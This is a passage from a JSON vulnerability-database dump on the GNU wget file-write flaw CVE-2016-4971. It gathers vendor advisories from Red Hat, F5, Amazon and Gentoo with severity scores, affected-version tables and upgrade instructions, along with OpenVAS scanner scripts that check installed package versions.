\n\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-06-14T08:18:41", "type": "redhatcve", "title": "CVE-2016-4971", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2021-05-06T18:32:04", "id": "RH:CVE-2016-4971", "href": "https://access.redhat.com/security/cve/cve-2016-4971", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "f5": [{"lastseen": "2021-06-08T18:45:13", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T00:00:00", "type": "f5", "title": "SOL55181425 - Wget vulnerability CVE-2016-4971", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T00:00:00", "id": "SOL55181425", "href": "http://support.f5.com/kb/en-us/solutions/public/k/55/sol55181425.html", "cvss": {"score": 4.3, "vector": 
"AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-06-08T00:16:23", "description": "\nF5 Product Development has assigned ID 490963 (ARX) and INSTALLER-2560 (Traffix SDC) to this vulnerability, and has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP AAM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP ASM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP DNS| None| 12.0.0 - 12.1.0| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP Link Controller| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1 \n11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP PEM| None| 12.0.0 - 12.1.0 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nBIG-IP WOM| None| 11.2.1 \n10.2.1 - 10.2.4| Not vulnerable| None \nARX| 6.2.0 - 6.4.0| None| Low| **Wget** utility \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nFirePass| None| 7.0.0| Not 
vulnerable| None \nBIG-IQ Cloud| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.2.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.0.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.1| Not vulnerable| None \nF5 MobileSafe| None| 1.0.0| Not vulnerable| None \nF5 WebSafe| None| 1.0.0| Not vulnerable| None \nTraffix SDC| 5.0.0 \n4.0.0 - 4.4.0| None| Low| **Wget** utility\n\nIf you are running a version listed in the Versions known to be vulnerable column, you can eliminate this vulnerability by upgrading to a version listed in the Versions known to be not vulnerable column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nTo mitigate this vulnerability, you should permit management access to F5 products only over a secure network and limit shell access to only trusted users. 
\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-07-13T21:28:00", "type": "f5", "title": "Wget vulnerability CVE-2016-4971", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-13T21:28:00", "id": "F5:K55181425", "href": "https://support.f5.com/csp/article/K55181425", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "amazon": [{"lastseen": "2022-11-01T21:17:28", "description": "**Issue Overview:**\n\nGNU wget before 1.18 allows remote servers to 
write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. (CVE-2016-4971)\n\n \n**Affected Packages:** \n\n\nwget\n\n \n**Issue Correction:** \nRun _yum update wget_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 wget-debuginfo-1.18-1.18.amzn1.i686 \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 wget-1.18-1.18.amzn1.x86_64 \n \u00a0\u00a0\u00a0 wget-debuginfo-1.18-1.18.amzn1.x86_64 \n \n \n\n### Additional References\n\nRed Hat: [CVE-2016-4971](<https://access.redhat.com/security/cve/CVE-2016-4971>)\n\nMitre: [CVE-2016-4971](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4971>)\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2016-07-14T16:30:00", "type": "amazon", "title": "Medium: wget", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-07-14T16:30:00", "id": "ALAS-2016-720", "href": "https://alas.aws.amazon.com/ALAS-2016-720.html", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "gentoo": 
[{"lastseen": "2022-01-17T19:06:21", "description": "### Background\n\nGNU Wget is a free software package for retrieving files using HTTP, HTTPS and FTP, the most widely-used Internet protocols. \n\n### Description\n\nMultiple vulnerabilities have been discovered in Wget. Please review the CVE identifier and bug reports referenced for details. \n\n### Impact\n\nA remote attacker could possibly execute arbitrary code with the privileges of the process or obtain sensitive information. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll GNU Wget users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose \">=net-misc/wget-1.18\"", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2016-10-29T00:00:00", "type": "gentoo", "title": "GNU Wget: Multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-4971"], "modified": "2016-10-29T00:00:00", "id": "GLSA-201610-11", "href": "https://security.gentoo.org/glsa/201610-11", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "openvas": [{"lastseen": "2020-01-27T18:33:58", 
"description": "The remote host is missing an update for the Huawei EulerOS\n ", "cvss3": {}, "published": "2020-01-23T00:00:00", "type": "openvas", "title": "Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2016-1064)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2020-01-23T00:00:00", "id": "OPENVAS:1361412562311220161064", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562311220161064", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.1.2.2016.1064\");\n script_version(\"2020-01-23T10:42:04+0000\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"2020-01-23 10:42:04 +0000 (Thu, 23 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-23 10:42:04 +0000 (Thu, 23 Jan 2020)\");\n script_name(\"Huawei EulerOS: Security Advisory for wget (EulerOS-SA-2016-1064)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Huawei EulerOS Local Security Checks\");\n script_dependencies(\"gb_huawei_euleros_consolidation.nasl\");\n script_mandatory_keys(\"ssh/login/euleros\", \"ssh/login/rpms\", re:\"ssh/login/release=EULEROS-2\\.0SP1\");\n\n script_xref(name:\"EulerOS-SA\", value:\"2016-1064\");\n script_xref(name:\"URL\", value:\"https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2016-1064\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the Huawei EulerOS\n 'wget' package(s) announced via the EulerOS-SA-2016-1064 advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"It was found that wget used a file name provided by the server for the downloaded file when following a HTTP redirect to a FTP server resource. 
This could cause wget to create a file with a different name than expected, possibly allowing the server to execute arbitrary code on the client.(CVE-2016-4971)\");\n\n script_tag(name:\"affected\", value:\"'wget' package(s) on Huawei EulerOS V2.0SP1.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"EULEROS-2.0SP1\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~10.2.h1\", rls:\"EULEROS-2.0SP1\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:10", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-19T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-e14374472f", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget FEDORA-2016-e14374472f\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it 
will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808447\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-19 05:26:11 +0200 (Sun, 19 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-e14374472f\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-e14374472f\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/J5ZK7PPOISSBFIAIJP6AV6CDYCCBTL6G\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:09", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-11-04T00:00:00", "type": "openvas", "title": "RedHat Update for wget RHSA-2016:2587-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310871702", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871702", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for wget RHSA-2016:2587-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871702\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-11-04 05:42:42 +0100 (Fri, 04 Nov 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"RedHat Update for wget RHSA-2016:2587-02\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The wget packages provide the GNU Wget file\nretrieval utility for HTTP, HTTPS, and FTP protocols.\n\nSecurity Fix(es):\n\n * It was found that wget used a file name provided by the server for the\ndownloaded file when following an HTTP redirect to a FTP server resource.\nThis could cause wget to create a file with a different name than expected,\npossibly allowing the server to execute arbitrary code on the client.\n(CVE-2016-4971)\n\nRed Hat would like to thank GNU wget project for reporting this issue.\nUpstream acknowledges Dawid Golunski as the original reporter.\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 7.3 Release Notes linked from the References section.\");\n 
script_tag(name:\"affected\", value:\"wget on Red Hat Enterprise Linux Server (v. 7)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"RHSA\", value:\"2016:2587-02\");\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2016-November/msg00023.html\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_7\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_7\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"wget-debuginfo\", rpm:\"wget-debuginfo~1.14~13.el7\", rls:\"RHENT_7\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2019-05-29T18:35:01", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-06-18T00:00:00", "type": "openvas", "title": "Fedora Update for wget FEDORA-2016-2db8cbc2fd", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310808439", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310808439", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for wget FEDORA-2016-2db8cbc2fd\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# 
Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.808439\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-06-18 05:26:44 +0200 (Sat, 18 Jun 2016)\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for wget FEDORA-2016-2db8cbc2fd\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'wget'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"wget on Fedora 23\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-2db8cbc2fd\");\n script_xref(name:\"URL\", 
value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5WRPRG5UOJBMTV4JL7KOKI4WU437DXG4\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC23\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC23\")\n{\n\n if ((res = isrpmvuln(pkg:\"wget\", rpm:\"wget~1.18~1.fc23\", rls:\"FC23\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2020-03-17T22:57:59", "description": "The remote host is missing an update announced via the referenced Security Advisory.", "cvss3": {}, "published": "2016-10-26T00:00:00", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2016-720)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-4971"], "modified": "2020-03-13T00:00:00", "id": "OPENVAS:1361412562310120709", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120709", "sourceData": "# Copyright (C) 2016 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but 
WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120709\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2016-10-26 15:38:15 +0300 (Wed, 26 Oct 2016)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2016-720)\");\n script_tag(name:\"insight\", value:\"GNU wget before 1.18 allows remote servers to write to arbitrary files by redirecting a request from HTTP to a crafted FTP resource. (CVE-2016-4971 )\");\n script_tag(name:\"solution\", value:\"Run yum update wget to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2016-720.html\");\n script_cve_id(\"CVE-2016-4971\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n 